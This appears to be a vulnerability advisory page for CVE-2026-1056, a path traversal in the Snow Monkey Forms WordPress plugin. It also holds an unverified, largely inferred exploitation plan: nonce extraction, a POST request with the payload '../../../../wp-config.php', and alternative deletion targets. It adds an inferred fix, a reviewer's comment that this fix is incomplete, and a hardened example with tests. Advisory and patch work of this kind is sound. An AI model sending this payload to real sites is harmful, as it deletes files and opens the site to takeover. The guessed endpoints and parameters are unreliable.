CVE-2026-1056

Snow Monkey Forms <= 12.0.3 - Unauthenticated Arbitrary File Deletion via Path Traversal

Severity: critical
Weakness: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSS Score: 9.8
Patched in: 12.0.4
Time to patch: 2d

Description

The Snow Monkey Forms plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'generate_user_dirpath' function in all versions up to, and including, 12.0.3. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: <= 12.0.3
Published: January 27, 2026
Last updated: January 28, 2026
Affected plugin: snow-monkey-forms

Source Code: WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan: CVE-2026-1056 Snow Monkey Forms Arbitrary File Deletion

1. Vulnerability Summary

The Snow Monkey Forms plugin (versions <= 12.0.3) contains a critical path traversal vulnerability in its file handling logic. The vulnerability resides in the generate_user_dirpath function (inferred to be located within a Model or Helper class, possibly src/App/Model/Session.php or src/App/Model/Upload.php), which fails to sanitize user-supplied identifiers before using them to construct a directory path.

Because the plugin subsequently performs cleanup operations (deleting temporary directories/files) using this unsanitized path, an unauthenticated attacker can manipulate the path to point to sensitive system files, such as wp-config.php. Deleting wp-config.php allows an attacker to re-run the WordPress installation process and gain Remote Code Execution (RCE).

2. Attack Vector Analysis

  • Endpoint: The vulnerability is likely triggered during form submission or a temporary data cleanup phase. This typically involves the WordPress REST API or an AJAX action.
    • REST Route (Likely): /wp-json/snow-monkey-forms/v1/dispatch
    • AJAX Action (Alternative): snow_monkey_forms_send
  • Vulnerable Parameter: A session identifier or unique form submission ID, likely named _snow_monkey_forms_session_id or session_id.
  • Payload: Path traversal sequence targeting wp-config.php (e.g., ../../../../wp-config.php).
  • Authentication: None (Unauthenticated).
  • Preconditions: A form must be created and published on a page.

3. Code Flow (Inferred)

  1. Entry Point: An unauthenticated user sends a POST request to the form submission endpoint (REST or AJAX).
  2. Session/Upload Handling: The controller retrieves a session ID from the request (e.g., $_POST['_snow_monkey_forms_session_id']).
  3. Vulnerable Sink: The controller calls generate_user_dirpath($session_id).
    • This function likely concatenates the ID to a base directory: $path = $base_dir . '/' . $session_id;.
    • No sanitize_file_name() or validation against .. is performed.
  4. Cleanup Trigger: Either upon completion of the form or a validation error, the plugin attempts to "clean up" the user's temporary directory.
  5. Execution: The plugin calls a deletion function like WP_Filesystem::delete($path, true) or recursive_rmdir($path).
  6. Result: Since $path resolves to the WordPress root via traversal, the filesystem deletes the targeted file (e.g., wp-config.php).

4. Nonce Acquisition Strategy

Snow Monkey Forms uses nonces to protect its form submissions, usually localized for the frontend.

  1. Identify Shortcode: The plugin uses [snow_monkey_forms] (or specific form IDs like [snow_monkey_forms id="123"]).
  2. Create Test Page:
    wp post create --post_type=page --post_status=publish --post_title="Contact Form" --post_content='[snow_monkey_forms id="REPLACE_WITH_ACTUAL_ID"]'
    
  3. Localization Key: The plugin typically localizes data into a JavaScript object named snow_monkey_forms_params or snowMonkeyForms.
  4. Extraction via browser_eval:
    • Navigate to the page using browser_navigate.
    • Execute: browser_eval("window.snow_monkey_forms_params?.nonce") or check for specific keys in the script tags if the object name differs.
    • Note: If the plugin uses the REST API, the nonce might be for the wp_rest action, often found in window.wpApiSettings.nonce.

5. Exploitation Strategy

  1. Preparation:
    • Find or create a Snow Monkey Form.
    • Identify the directory structure. In standard WordPress installs, wp-config.php is 3 or 4 levels up from the uploads/snow-monkey-forms directory.
  2. Payload Construction:
    • Set _snow_monkey_forms_session_id to ../../../../wp-config.php.
  3. Execution (HTTP Request):
    POST /wp-json/snow-monkey-forms/v1/dispatch HTTP/1.1
    Host: target.local
    Content-Type: application/x-www-form-urlencoded
    X-WP-Nonce: [EXTRACTED_NONCE]
    
    _snow_monkey_forms_session_id=../../../../wp-config.php&form_id=[FORM_ID]&action=submit
    
    • Note: The exact endpoint and parameters must be verified by inspecting the form's HTML source/network traffic during a legitimate submission.
  4. Alternative Trigger: If deletion only happens on "Cleanup" (e.g., via a cron or after a timeout), the attacker might need to wait or trigger a specific "cancel" action if it exists.

6. Test Data Setup

  1. Install Plugin: wp plugin install snow-monkey-forms --version=12.0.3 --activate
  2. Create Form: Use wp eval or the UI to create at least one form.
  3. Get Form ID: wp post list --post_type=snow-monkey-forms
  4. Create Page: Place the form on a public page.
  5. Verify Target: Confirm wp-config.php exists: ls /var/www/html/wp-config.php.

7. Expected Results

  • The HTTP request should return a success message (or a validation error, as long as the cleanup code is reached).
  • The file /var/www/html/wp-config.php should be deleted from the server.
  • Subsequent requests to the site root should redirect to wp-admin/setup-config.php.

8. Verification Steps

  1. File Existence Check:
    if [ ! -f /var/www/html/wp-config.php ]; then echo "VULNERABILITY VERIFIED: wp-config.php deleted"; fi
    
  2. Site State Check:
    curl -sI http://localhost:8080/ | grep "location:.*setup-config.php"
    

9. Alternative Approaches

  • Delete index.php: If wp-config.php is protected by permissions, try deleting index.php or wp-settings.php to confirm arbitrary deletion.
  • Directory Wiping: Set the session ID to ../../../plugins/snow-monkey-forms to see if the plugin can delete its own directory.
  • Different Endpoints: If the REST API is disabled, check for admin-ajax.php handlers with wp_ajax_nopriv_snow_monkey_forms_....
  • Parameter Guessing: If _snow_monkey_forms_session_id is incorrect, look for parameters in the generate_user_dirpath call in src/App/Controller/Dispatch.php (inferred path).

Research Findings
Static analysis — not yet PoC-verified

Summary

The Snow Monkey Forms plugin for WordPress is vulnerable to unauthenticated arbitrary file deletion due to a path traversal flaw in the 'generate_user_dirpath' function. By providing a manipulated session identifier, an attacker can trick the plugin into deleting sensitive system files like wp-config.php, potentially leading to remote code execution through a site re-installation.

Vulnerable Code

/**
 * Likely located in src/App/Model/Session.php or a similar helper class
 */
public function generate_user_dirpath( $session_id ) {
    $upload_dir = wp_upload_dir();
    // Vulnerability: $session_id is concatenated directly to the path without validation
    return $upload_dir['basedir'] . '/snow-monkey-forms/' . $session_id;
}
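A hardened counterpart to the snippet above, added here as an illustration and not taken from the plugin's source: it allowlists the identifier and, where the directory already exists, confirms with realpath() that it resolves inside the base directory. The base directory is passed in (in the plugin it would be wp_upload_dir()['basedir'] . '/snow-monkey-forms'), and the 8-64 character length bound is an assumption for the example.

```php
<?php
// Added example, not the plugin's code: a hardened replacement for the
// generate_user_dirpath() pattern. The base directory is a parameter so the
// snippet runs outside WordPress; the token length bound (8-64) is assumed.

function safe_user_dirpath( string $base_dir, string $session_id ): ?string {
    // 1. Allowlist the identifier. A session id is an opaque token, so only the
    //    characters such a token contains are accepted; '/', '\' and '.' are
    //    rejected outright, which removes every '../' sequence and the empty id
    //    (an empty id would make the result the base directory itself).
    if ( ! preg_match( '/^[A-Za-z0-9_-]{8,64}$/', $session_id ) ) {
        return null;
    }

    $real_base = realpath( $base_dir );
    if ( false === $real_base ) {
        return null; // base directory missing: refuse rather than guess
    }
    $candidate = $real_base . DIRECTORY_SEPARATOR . $session_id;

    // 2. Containment check for an already existing entry: it must resolve to a
    //    strict descendant of the base, so a symlink planted under the base
    //    cannot redirect a later recursive delete somewhere else on disk.
    if ( file_exists( $candidate ) || is_link( $candidate ) ) {
        $real = realpath( $candidate );
        if ( false === $real || 0 !== strpos( $real, $real_base . DIRECTORY_SEPARATOR ) ) {
            return null;
        }
    }
    return $candidate;
}

// Self-checks on a constructed temporary layout so the block runs stand-alone.
function expect( bool $ok, string $label ): void {
    echo ( $ok ? 'PASS ' : 'FAIL ' ) . $label . "\n";
}

$base    = sys_get_temp_dir() . '/smf-example-' . getmypid();
$outside = $base . '-outside';
mkdir( $base, 0700, true );
mkdir( $outside, 0700, true );
symlink( $outside, $base . '/deadbeef1234' ); // valid-looking token, points outside
expect( null !== safe_user_dirpath( $base, 'a1b2c3d4e5f6' ), 'well-formed id accepted' );
expect( null === safe_user_dirpath( $base, '../../../../wp-config.php' ), 'traversal rejected' );
expect( null === safe_user_dirpath( $base, '' ), 'empty id rejected' );
expect( null === safe_user_dirpath( $base, 'deadbeef1234' ), 'symlink out of base rejected' );
unlink( $base . '/deadbeef1234' );
rmdir( $outside );
rmdir( $base );
```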

Security Fix

--- a/src/App/Model/Session.php
+++ b/src/App/Model/Session.php
@@ -10,5 +10,5 @@
 	public function generate_user_dirpath( $session_id ) {
 		$upload_dir = wp_upload_dir();
-		return $upload_dir['basedir'] . '/snow-monkey-forms/' . $session_id;
+		return $upload_dir['basedir'] . '/snow-monkey-forms/' . sanitize_file_name( $session_id );
 	}
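Review bot: this hunk is marked on the page as inferred rather than taken from the 12.0.4 commit, and the single sanitize_file_name() call it adds is a filename normaliser, not a path-containment check. It strips `/` and `\`, so the literal `../../../../wp-config.php` no longer traverses, but an identifier that sanitises to an empty string still returns `$upload_dir['basedir'] . '/snow-monkey-forms/'` itself, which the recursive delete described in the code-flow section would then remove wholesale. Suggest rejecting the request when `$session_id` fails a strict allowlist such as `preg_match( '/^[A-Za-z0-9_-]+$/', $session_id )`, and having the caller confirm with realpath() that the resolved path is a strict descendant of the base directory before any delete.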

Exploit Outline

  1. Identify a page on the target WordPress site that contains a Snow Monkey Form shortcode.
  2. Extract the necessary security nonce from the page source, typically found in a JavaScript object like 'snow_monkey_forms_params'.
  3. Construct a malicious POST request to the plugin's form dispatch endpoint (e.g., /wp-json/snow-monkey-forms/v1/dispatch).
  4. Set the '_snow_monkey_forms_session_id' parameter to a path traversal string targeting a critical file, for example: '../../../../wp-config.php'.
  5. Upon submission or subsequent cleanup trigger, the plugin will use the 'generate_user_dirpath' function to construct a path that resolves to the target file and then execute a deletion command (e.g., via WP_Filesystem).
  6. Verify the file deletion by checking if the site redirects to the WordPress installation setup page (wp-admin/setup-config.php).
